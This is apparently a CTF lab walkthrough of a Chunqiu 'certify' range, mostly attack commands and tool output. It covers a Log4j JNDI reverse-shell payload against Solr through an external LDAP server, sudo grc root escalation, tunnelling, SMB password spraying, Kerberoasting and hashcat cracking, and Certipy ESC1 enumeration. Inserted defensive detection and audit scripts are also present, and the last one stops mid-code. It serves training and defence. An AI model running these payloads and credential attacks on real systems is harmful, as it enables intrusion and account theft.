┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# fscan -h 39.99.134.81
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.0s] 已选择服务扫描模式
[1.0s] 开始信息扫描
[1.0s] 最终有效主机数量: 1
[1.0s] 开始主机扫描
[1.0s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.0s] 有效端口数量: 233
[1.1s] [*] 端口开放 39.99.134.81:80
[1.1s] [*] 端口开放 39.99.134.81:22
[1.1s] [*] 端口开放 39.99.134.81:8983
[4.1s] 扫描完成, 发现 3 个开放端口
[4.1s] 存活端口数量: 3
[4.1s] 开始漏洞扫描
[4.1s] POC加载完成: 总共387个,成功387个,失败0个
[4.2s] [*] 网站标题 http://39.99.134.81 状态码:200 长度:612 标题:Welcome to nginx!
[4.7s] [*] 网站标题 http://39.99.134.81:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://39.99.134.81:8983/solr/
[5.0s] [*] 网站标题 http://39.99.134.81:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin
[14.7s] 扫描已完成: 5/5
Browsing to port 8983 shows a Solr instance, which uses the log4j component.

http://39.101.140.92:8983/solr/admin/collections?action=${jndi:ldap://jrtcdopftt.iyhc.eu.org}

Java environment setup: Linux Java version management
GitHub - zzwlpx/JNDIExploit: A malicious LDAP server for JNDI injection attacks
root@VM-12-4-ubuntu:~/tools# java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 43.159.45.90
[+] LDAP Server Start Listening on 1389...
[+] HTTP Server Start Listening on 8080...
[+] Received LDAP Query: Basic/ReverseShell/43.159.45.90/9999
[+] Payload: reverseshell
[+] IP: 43.159.45.90
[+] Port: 9999
[+] Sending LDAP ResourceRef result for Basic/ReverseShell/43.159.45.90/9999 with basic remote reference payload
[+] Send LDAP reference result for Basic/ReverseShell/43.159.45.90/9999 redirecting to http://43.159.45.90:8080/Exploit2SUpdh66Hk.class
[+] New HTTP Request From /39.99.225.156:50138 /Exploit2SUpdh66Hk.class
[+] Receive ClassRequest: Exploit2SUpdh66Hk.class
[+] Response Code: 200
Getting a reverse shell
/solr/admin/collections?action=${jndi:ldap://xxx/Basic/ReverseShell/ip/9999}
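The request above leaves a recognisable trace in the Solr or reverse-proxy access log. The following detection sketch is an added example, not part of the original write-up: it URL-decodes each line, collapses nested lookups, and reports the callback endpoint a responder would pivot on. The log lines, client addresses and `callback.example.invalid` are constructed sample values.

```python
import re
from urllib.parse import unquote

# Inner lookups such as ${lower:j} or ${env:X:-j} resolve to their last part,
# so they are collapsed before looking for the jndi: prefix.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.I)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}]+)(/[^\s}]*)?", re.I)

# Constructed access-log lines (documentation addresses and host names).
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Nov/2025:10:00:01 +0000] '
    '"GET /solr/admin/collections?action=LIST HTTP/1.1" 200 512',
    '192.0.2.66 - - [06/Nov/2025:10:00:07 +0000] '
    '"GET /solr/admin/collections?action=${jndi:ldap://callback.example.invalid/a} HTTP/1.1" 400 311',
    '192.0.2.67 - - [06/Nov/2025:10:00:09 +0000] '
    '"GET /solr/admin/collections?action=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example.invalid%2Fa%7D HTTP/1.1" 400 311',
    '192.0.2.68 - - [06/Nov/2025:10:00:12 +0000] '
    '"GET /solr/admin/collections?action=${${lower:j}ndi:${lower:l}dap://callback.example.invalid/a} HTTP/1.1" 400 311',
]


def normalise(text, max_rounds=6):
    """Undo percent-encoding and nested lookups until the text stops changing."""
    for _ in range(max_rounds):
        before = text
        text = unquote(text)
        text = _CASE_LOOKUP.sub(r"\1", text)
        text = _DEFAULT_LOOKUP.sub(r"\1", text)
        if text == before:
            break
    return text


def scan(lines):
    """Return one record per log line that carries a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalise(line))
        if match:
            hits.append({
                "line": number,
                "client": line.split()[0],        # first field of the log line
                "scheme": match.group(1).lower(),  # ldap, rmi, dns, ...
                "endpoint": match.group(2),        # host[:port] the JVM would contact
                "path": match.group(3) or "",
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A hit in the access log only shows the attempt; an outbound LDAP or HTTP connection from the Solr host to the reported endpoint is what confirms the lookup was executed.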
solr@ubuntu:/opt/solr/server$ sudo -l
Matching Defaults entries for solr on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User solr may run the following commands on ubuntu:
(root) NOPASSWD: /usr/bin/grc

solr@ubuntu:/opt/solr/server$ sudo grc --pty /bin/sh
# whoami
root
root@ubuntu:~/flag# cat flag01.txt
██████ ██ ██ ████
██░░░░██ ░██ ░░ ░██░ ██ ██
██ ░░ █████ ██████ ██████ ██ ██████ ░░██ ██
░██ ██░░░██░░██░░█░░░██░ ░██░░░██░ ░░███
░██ ░███████ ░██ ░ ░██ ░██ ░██ ░██
░░██ ██░██░░░░ ░██ ░██ ░██ ░██ ██
░░██████ ░░██████░███ ░░██ ░██ ░██ ██
░░░░░░ ░░░░░░ ░░░ ░░ ░░ ░░ ░░
Easy right?
Maybe you should dig into my core domain network.
flag01: flag{fec3a533-f2d0-4614-a211-6c470f5de530}
root@ubuntu:~/flag# ./fscan -h 172.22.9.19/24
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.1
[1.8s] 已选择服务扫描模式
[1.8s] 开始信息扫描
[1.8s] CIDR范围: 172.22.9.0-172.22.9.255
[1.8s] generate_ip_range_full
[1.8s] 解析CIDR 172.22.9.19/24 -> IP范围 172.22.9.0-172.22.9.255
[1.8s] 最终有效主机数量: 256
[1.8s] 开始主机扫描
[1.8s] 使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
[1.8s] [*] 目标 172.22.9.19 存活 (ICMP)
[1.8s] [*] 目标 172.22.9.26 存活 (ICMP)
[1.8s] [*] 目标 172.22.9.47 存活 (ICMP)
[1.8s] [*] 目标 172.22.9.7 存活 (ICMP)
[4.8s] 存活主机数量: 4
[4.8s] 有效端口数量: 233
[4.9s] [*] 端口开放 172.22.9.47:445
[4.9s] [*] 端口开放 172.22.9.47:139
[4.9s] [*] 端口开放 172.22.9.19:22
[4.9s] [*] 端口开放 172.22.9.19:80
[4.9s] [*] 端口开放 172.22.9.47:80
[4.9s] [*] 端口开放 172.22.9.47:22
[4.9s] [*] 端口开放 172.22.9.47:21
[4.9s] [*] 端口开放 172.22.9.26:445
[4.9s] [*] 端口开放 172.22.9.26:139
[4.9s] [*] 端口开放 172.22.9.26:135
[4.9s] [*] 端口开放 172.22.9.19:8983
[4.9s] [*] 端口开放 172.22.9.7:389
[4.9s] [*] 端口开放 172.22.9.7:445
[4.9s] [*] 端口开放 172.22.9.7:139
[4.9s] [*] 端口开放 172.22.9.7:135
[4.9s] [*] 端口开放 172.22.9.7:88
[4.9s] [*] 端口开放 172.22.9.7:80
[7.9s] 扫描完成, 发现 17 个开放端口
[7.9s] 存活端口数量: 17
[7.9s] 开始漏洞扫描
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.9.7
主机名: XIAORANG-DC
发现的网络接口:
IPv4地址:
└─ 172.22.9.7
[8.0s] [*] NetInfo 扫描结果
目标主机: 172.22.9.26
主机名: DESKTOP-CBKTVMO
发现的网络接口:
IPv4地址:
└─ 172.22.9.26
[8.0s] [*] 网站标题 http://172.22.9.19 状态码:200 长度:612 标题:Welcome to nginx!
[8.0s] [*] 网站标题 http://172.22.9.47 状态码:200 长度:10918 标题:Apache2 Ubuntu Default Page: It works
[8.0s] [+] NetBios 172.22.9.47 fileserver Windows 6.1
[8.0s] [+] SMB认证成功 172.22.9.47:445 administrator:admin
[8.0s] [+] NetBios 172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab Windows Server 2016 Datacenter 14393
[8.0s] [+] NetBios 172.22.9.7 DC:XIAORANG\XIAORANG-DC
[8.1s] 系统信息 172.22.9.47 [Windows 6.1]
[8.1s] POC加载完成: 总共387个,成功387个,失败0个
[8.2s] [*] 网站标题 http://172.22.9.7 状态码:200 长度:703 标题:IIS Windows Server
[8.2s] [*] 网站标题 http://172.22.9.19:8983 状态码:302 长度:0 标题:无标题 重定向地址: http://172.22.9.19:8983/solr/
[8.4s] SMB2共享信息 172.22.9.47:445 administrator Pass: 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:admin 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:root 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:admin123 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:123456 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:P@ssword123 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:password 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:pass@123 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:Password 共享:[print$ fileshare IPC$]
[8.5s] SMB2共享信息 172.22.9.47:445 administrator Pass:pass123 共享:[print$ fileshare IPC$]
[9.0s] [*] 网站标题 http://172.22.9.19:8983/solr/ 状态码:200 长度:16555 标题:Solr Admin
172.22.9.7 DC:XIAORANG\XIAORANG-DC
172.22.9.19 solr log4j2
172.22.9.26 DESKTOP-CBKTVMO.xiaorang.lab
172.22.9.47 fileserver SMB anonymous session
./stowaway_agent -l 7788 # server side
./stowaway_agent -c 43.159.45.90:7788 # client connects
Configure /etc/hosts
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q nxc smb 172.22.9.7 -u guest -p '' --generate-hosts-file hosts
SMB 172.22.9.7 445 XIAORANG-DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:XIAORANG-DC) (domain:xiaorang.lab) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 172.22.9.7 445 XIAORANG-DC [-] xiaorang.lab\guest: STATUS_ACCOUNT_DISABLED
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# cat hosts
172.22.9.7 XIAORANG-DC.xiaorang.lab xiaorang.lab XIAORANG-DC
List the shares
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q nxc smb 172.22.9.47 -u guest -p '' --shares
SMB 172.22.9.47 445 FILESERVER [*] Unix - Samba (name:FILESERVER) (domain:) (signing:False) (SMBv1:True) (Null Auth:True)
SMB 172.22.9.47 445 FILESERVER [+] \guest: (Guest)
SMB 172.22.9.47 445 FILESERVER [*] Enumerated shares
SMB 172.22.9.47 445 FILESERVER Share Permissions Remark
SMB 172.22.9.47 445 FILESERVER ----- ----------- ------
SMB 172.22.9.47 445 FILESERVER print$ Printer Drivers
SMB 172.22.9.47 445 FILESERVER fileshare READ,WRITE bill share
SMB 172.22.9.47 445 FILESERVER IPC$ IPC Service (fileserver server (Samba, Ubuntu))
Connect to the fileshare share with smbclient
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q smbclient //172.22.9.47/fileshare
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 6 10:19:56 2025
.. D 0 Wed Jul 13 00:35:09 2022
personnel.db A 61440 Wed Jul 13 03:46:55 2022
secret D 0 Thu Nov 6 08:57:59 2025
Certified_Pre-Owned.7z N 9572925 Wed Jul 13 04:12:03 2022
Certified_Pre-Owned.pdf N 10406101 Wed Jul 13 04:08:14 2022
dCSjzXhRpm D 0 Thu Nov 6 10:15:51 2025
41152812 blocks of size 1024. 36063772 blocks available
smb: \> get personnel.db
getting file \personnel.db of size 61440 as personnel.db (27.2 KiloBytes/sec) (average 27.2 KiloBytes/sec)
smb: \> cd secret
smb: \secret\> ls
. D 0 Thu Nov 6 08:57:59 2025
.. D 0 Thu Nov 6 10:19:56 2025
flag02.txt N 659 Thu Nov 6 08:57:59 2025
41152812 blocks of size 1024. 36063740 blocks available
smb: \secret\> get flag02.txt
getting file \secret\flag02.txt of size 659 as flag02.txt (0.3 KiloBytes/sec) (average 14.8 KiloBytes/sec)
smb: \secret\> exit
┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# cat flag02.txt
________ _______ ________ _________ ___ ________ ___ ___
|\ ____\|\ ___ \ |\ __ \|\___ ___\\ \|\ _____\\ \ / /|
\ \ \___|\ \ __/|\ \ \|\ \|___ \ \_\ \ \ \ \__/\ \ \/ / /
\ \ \ \ \ \_|/_\ \ _ _\ \ \ \ \ \ \ \ __\\ \ / /
\ \ \____\ \ \_|\ \ \ \\ \| \ \ \ \ \ \ \ \_| \/ / /
\ \_______\ \_______\ \__\\ _\ \ \__\ \ \__\ \__\__/ / /
\|_______|\|_______|\|__|\|__| \|__| \|__|\|__|\___/ /
\|___|/
flag02: flag{b013a137-770b-4797-ba16-c8cf431dab4a}
Yes, you have enumerated smb. But do you know what an SPN is?
Download the db file.
Passwords

Usernames

┌──(root㉿kali)-[~/Desktop/ChunQiu/certify]
└─# proxychains -q nxc smb 172.22.9.26 -u valid_users -p passwords.txt
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [*] Windows Server 2016 Datacenter 14393 x64 (name:DESKTOP-CBKTVMO) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\huangmin:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangrong:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoli:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangyan:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhoujing:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\liuying:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanghao:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wangqiang:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\wanglu:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhaoyong:admin STATUS_LOGON_FAILURE
<SNIP>
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [-] xiaorang.lab\zhangjian:admin STATUS_LOGON_FAILURE
SMB 172.22.9.26 445 DESKTOP-CBKTVMO [+] xiaorang.lab\zhangjian:i9XDE02pLVf
xiaorang.lab\zhangjian:i9XDE02pLVf
┌──(root㉿kali)-[~]
└─# proxychains -q impacket-GetUserSPNs -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian:i9XDE02pLVf
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
------------------------------------- -------- -------- -------------------------- --------- ----------
TERMSERV/desktop-cbktvmo.xiaorang.lab zhangxia 2023-07-14 00:45:45.213944 <never>
WWW/desktop-cbktvmo.xiaorang.lab/IIS zhangxia 2023-07-14 00:45:45.213944 <never>
TERMSERV/win2016.xiaorang.lab chenchen 2023-07-14 00:45:39.767035 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$88386e891b47441e6856dbab73264dc2$<SNIP>
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$c4ea79ab1d180405affcbf36e858e11d$<SNIP>
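The `$krb5tgs$23$` prefix means both service tickets were issued with RC4-HMAC (etype 23), which the domain controller records as event 4769 with TicketEncryptionType 0x17. The following detection sketch is an added example, not part of the original write-up: it flags one account requesting RC4 tickets for several user-backed services in a short window. The event records, timestamps, window and threshold are constructed assumptions; the field names follow the Windows 4769 event schema.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, the "$krb5tgs$23$" prefix in the output above

# Constructed 4769 records (already parsed from the Security log).
EVENTS = [
    {"time": "2025-11-06T11:02:10", "TargetUserName": "zhangjian@XIAORANG.LAB",
     "ServiceName": "zhangxia", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:172.22.9.19", "Status": "0x0"},
    {"time": "2025-11-06T11:02:11", "TargetUserName": "zhangjian@XIAORANG.LAB",
     "ServiceName": "chenchen", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:172.22.9.19", "Status": "0x0"},
    # Ordinary AES ticket for a machine account: ignored.
    {"time": "2025-11-06T11:03:00", "TargetUserName": "wanghao@XIAORANG.LAB",
     "ServiceName": "DESKTOP-CBKTVMO$", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:172.22.9.26", "Status": "0x0"},
    # AES ticket for a user-backed service: ignored.
    {"time": "2025-11-06T11:05:00", "TargetUserName": "liying@XIAORANG.LAB",
     "ServiceName": "zhangxia", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:172.22.9.26", "Status": "0x0"},
    # Two RC4 requests hours apart: below the burst threshold.
    {"time": "2025-11-06T09:00:00", "TargetUserName": "wanghao@XIAORANG.LAB",
     "ServiceName": "zhangxia", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:172.22.9.26", "Status": "0x0"},
    {"time": "2025-11-06T11:30:00", "TargetUserName": "wanghao@XIAORANG.LAB",
     "ServiceName": "chenchen", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:172.22.9.26", "Status": "0x0"},
]


def find_kerberoast_candidates(events, window=timedelta(minutes=5), min_services=2):
    """Flag requesters that obtain RC4 tickets for several user-backed SPNs in one window."""
    by_requester = defaultdict(list)
    for ev in events:
        service = ev["ServiceName"]
        if ev.get("Status") != "0x0":
            continue                              # failed requests yield no ticket
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue
        if service.endswith("$") or service.lower() == "krbtgt":
            continue                              # machine accounts and TGT renewals
        requester = ev["TargetUserName"].split("@")[0].lower()
        if requester == service.lower():
            continue
        when = datetime.fromisoformat(ev["time"])
        by_requester[requester].append((when, service.lower(), ev["IpAddress"]))

    alerts = []
    for requester, hits in by_requester.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans at most `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            in_window = hits[start:end + 1]
            services = sorted({h[1] for h in in_window})
            if len(services) >= min_services:
                alerts.append({
                    "requester": requester,
                    "services": services,
                    "sources": sorted({h[2] for h in in_window}),
                    "first_seen": in_window[0][0].isoformat(),
                })
                break
    return alerts


if __name__ == "__main__":
    for alert in find_kerberoast_candidates(EVENTS):
        print(alert)
```

Both service accounts here had passwords that fell to a wordlist, so the durable fix is long random passwords or group managed service accounts for SPN-bearing accounts, with RC4 disabled where clients allow it.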
Crack with hashcat
hashcat.exe -m 13100 hash.txt rockyou.txt
$krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/chenchen*$c4ea79ab1d180405affcbf36e858e11d$<SNIP>:@Passw0rd@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*chenchen$XIAORANG.LAB$xiaorang.lab/che...63abf7
Time.Started.....: Fri Nov 07 00:03:10 2025 (1 sec)
Time.Estimated...: Fri Nov 07 00:03:11 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 16586.1 kH/s (6.06ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11796480/14344388 (82.24%)
Rejected.........: 0/11796480 (0.00%)
Restore.Point....: 11010048/14344388 (76.76%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: Joyve31 -> 8205385
Hardware.Mon.#01.: Temp: 53c Util: 26% Core:1890MHz Mem:8001MHz Bus:8
$krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zhangxia*$88386e891b47441e6856dbab73264dc2$<SNIP>:MyPass2@@6
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*zhangxia$XIAORANG.LAB$xiaorang.lab/zha...1a3643
Time.Started.....: Fri Nov 07 00:04:06 2025 (0 secs)
Time.Estimated...: Fri Nov 07 00:04:06 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 16690.0 kH/s (6.54ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344388 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 10223616/14344388 (71.27%)
Restore.Sub.#01..: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#01...: alisonpanda -> Joywang328
Hardware.Mon.#01.: Temp: 52c Util: 33% Core:1890MHz Mem:8001MHz Bus:8
172.22.9.26
xiaorang.lab\zhangxia MyPass2@@6
xiaorang.lab\chenchen @Passw0rd@
Both of these accounts can log in, but privilege escalation is still needed.
┌──(root㉿kali)-[~]
└─# proxychains -q certipy find -u 'chenchen@xiaorang.lab' -p '@Passw0rd@' -dc-ip '172.22.9.7' -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 13 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[!] DNS resolution failed: The resolution lifetime expired after 5.403 seconds: Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.; Server Do53:172.22.9.7@53 answered The DNS operation timed out.
[!] Use -debug to print a stacktrace
[*] Retrieving CA configuration for 'xiaorang-XIAORANG-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'xiaorang-XIAORANG-DC-CA'
[*] Checking web enrollment for CA 'xiaorang-XIAORANG-DC-CA' @ 'XIAORANG-DC.xiaorang.lab'
[!] Error checking web enrollment: [Errno 111] Connection refused
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : xiaorang-XIAORANG-DC-CA
DNS Name : XIAORANG-DC.xiaorang.lab
Certificate Subject : CN=xiaorang-XIAORANG-DC-CA, DC=xiaorang, DC=lab
Certificate Serial Number : 43A73F4A37050EAA4E29C0D95BC84BB5
Certificate Validity Start : 2023-07-14 04:33:21+00:00
Certificate Validity End : 2028-07-14 04:43:21+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : XIAORANG.LAB\Administrators
Access Rights
ManageCa : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
ManageCertificates : XIAORANG.LAB\Administrators
XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Enroll : XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates
0
Template Name : XR Manager
Display Name : XR Manager
Certificate Authorities : xiaorang-XIAORANG-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2023-07-14T04:51:15+00:00
Template Last Modified : 2023-07-14T04:51:44+00:00
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
Object Control Permissions
Owner : XIAORANG.LAB\Administrator
Full Control Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Owner Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Dacl Principals : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Enterprise Admins
Write Property Enroll : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
[+] User Enrollable Principals : XIAORANG.LAB\Domain Users
XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
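ESC1 is a conjunction of template settings, and changing any one of them breaks it. The following audit sketch is an added example, not part of the original write-up or of Certipy: it parses the flattened `certipy find` text as it appears above and reports which conditions hold for each template. `SAMPLE` is an excerpt of that output, and the low-privilege group list is an assumption to adjust per domain.

```python
import re

# Excerpt of the `certipy find` output above, flattened as on this page.
SAMPLE = r"""Certificate Templates
0
Template Name : XR Manager
Enabled : True
Client Authentication : True
Any Purpose : False
Enrollee Supplies Subject : True
Extended Key Usage : Encrypting File System
Secure Email
Client Authentication
Requires Manager Approval : False
Authorized Signatures Required : 0
Permissions
Enrollment Permissions
Enrollment Rights : XIAORANG.LAB\Domain Admins
XIAORANG.LAB\Domain Users
XIAORANG.LAB\Enterprise Admins
XIAORANG.LAB\Authenticated Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
"""

_KEY_VALUE = re.compile(r"^(?:\[[+!*]\]\s*)?([A-Za-z][A-Za-z0-9 ]*?)\s+:\s+(.*)$")
_HEADERS = {"permissions", "enrollment permissions", "object control permissions",
            "certificate templates", "certificate authorities"}
# Assumption: groups that any domain account is a member of.
LOW_PRIV = {"domain users", "authenticated users", "domain computers", "everyone"}
AUTH_EKUS = {"client authentication", "pkinit client authentication",
             "smart card logon", "any purpose"}


def parse_templates(text):
    """Turn 'Key : Value' lines plus bare continuation lines into one dict per template."""
    templates, current, key = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.lower() in _HEADERS or line.isdigit() or line.lower().endswith("vulnerabilities"):
            key = None                      # section header, not a continuation value
            continue
        match = _KEY_VALUE.match(line)
        if match:
            key, value = match.group(1), match.group(2).strip()
            if key == "Template Name":
                current = {}
                templates.append(current)
            if current is not None:
                current[key] = [value]
        elif current is not None and key is not None:
            current[key].append(line)       # multi-valued field such as Enrollment Rights
    return templates


def esc1_findings(template):
    """Evaluate each ESC1 precondition separately so the report shows what to change."""
    def flag(name):
        return template.get(name, ["False"])[0].lower() == "true"

    ekus = {e.lower() for e in template.get("Extended Key Usage", [])}
    enrollers = [p for p in template.get("Enrollment Rights", [])
                 if p.split("\\")[-1].lower() in LOW_PRIV]
    checks = {
        "enabled": flag("Enabled"),
        "enrollee_supplies_subject": flag("Enrollee Supplies Subject"),
        "authentication_eku": bool(ekus & AUTH_EKUS) or flag("Any Purpose"),
        "no_manager_approval": not flag("Requires Manager Approval"),
        "no_authorized_signature": template.get("Authorized Signatures Required", ["0"])[0] == "0",
        "low_priv_enrollment": bool(enrollers),
    }
    return {
        "template": template.get("Template Name", ["?"])[0],
        "esc1": all(checks.values()),
        "checks": checks,
        "low_priv_enrollers": enrollers,
    }


def audit(text):
    return [esc1_findings(t) for t in parse_templates(text)]

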